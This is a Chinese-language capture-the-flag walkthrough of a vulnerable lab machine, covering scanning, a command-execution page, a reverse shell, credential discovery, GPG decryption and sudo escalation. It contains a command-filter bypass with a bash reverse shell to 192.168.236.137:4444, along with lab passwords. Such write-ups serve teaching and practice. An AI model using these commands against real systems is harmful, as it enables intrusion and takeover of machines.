一、信息收集
1、主机发现
nmap 192.168.236.0/24
2、端口扫描
nmap 192.168.236.161 -p- -A
3、目录扫描
dirsearch -u http://192.168.236.161
二、漏洞探测
步骤一:访问80端口,查看 /robots.txt 文件
步骤二:拼接访问 /dev_shell.php ,是一个命令执行页面
步骤三:执行 whoami | ls ,发现备份文件,下载查看,看到过滤了一些命令
三、GetShell
尝试反弹shell
pwd&echo "bash -i >& /dev/tcp/192.168.236.137/4444 0>&1" | bash
四、提权
步骤一:切换到 /home 目录下,查看
步骤二:查看bob目录下的文件,发现密码文件
步骤三:查看文件,得到 jc 和 seb 的密码
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
步骤四:在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret,解密文件失败,权限不够
gpg -d login.txt.gpg
步骤五:在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下,发现了 notes.sh 文件,查看其中内容,是藏头诗,密钥为
HARPOCRATES
步骤六:使用 ssh 登录其他用户,记得端口修改为 25468
步骤七:再次解密,得到bob密码
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
bob:b0bcat_
步骤八:登录bob用户,sudo -l 查看权限,显示为 all
步骤九:sudo su ,成功提权